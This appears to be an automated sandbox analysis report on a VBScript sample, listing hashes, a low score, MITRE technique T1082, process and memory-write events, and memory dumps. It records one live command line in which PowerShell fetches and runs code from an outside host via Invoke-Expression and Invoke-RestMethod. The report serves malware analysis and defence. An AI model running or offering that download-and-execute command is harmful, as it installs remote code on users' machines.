f8e3299a52d2c8f45a92331bb553e80e46e63d9bac7ff6351724736f8805f6f4

Analysis

max time kernel
119s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-03-2024 08:03

Target

cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040.vbs
Size

6KB
MD5

2a4b987fdbd42a6a5cfbfdc334ce634f
SHA1

9964d7287bb64f36231b751eb80608176fc8b687
SHA256

cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040
SHA512

4aabaf92a6bf309869ee2ab6eabb9081bb4b5fc57362d9b343fdc7e8eb010ef66512aa5e80056cdb9501f0602d413d325ccc81f1cff3ebe7756167d163d09b80
SSDEEP

192:QMg119gkCtL3IqSPN3QzGNzUoNK9V4nN9:Ly19gR3IquNgzG2oN7r

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1436	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1436	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 1436	1664	WScript.exe	28
PID 1664 wrote to memory of 1436	1664	WScript.exe	28
PID 1664 wrote to memory of 1436	1664	WScript.exe	28

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cb65d95a1496fd2e5105954eb3046df90c4262f19fa7d7d77fa59b488348b040.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'backupitfirst.com/rudxfiyb')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1436

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1436-4-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/1436-5-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/1436-7-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1436-8-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1436-6-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/1436-9-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1436-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download
memory/1436-11-0x0000000002600000-0x0000000002680000-memory.dmp

Filesize
512KB

Download
memory/1436-12-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

Filesize
9.6MB

Download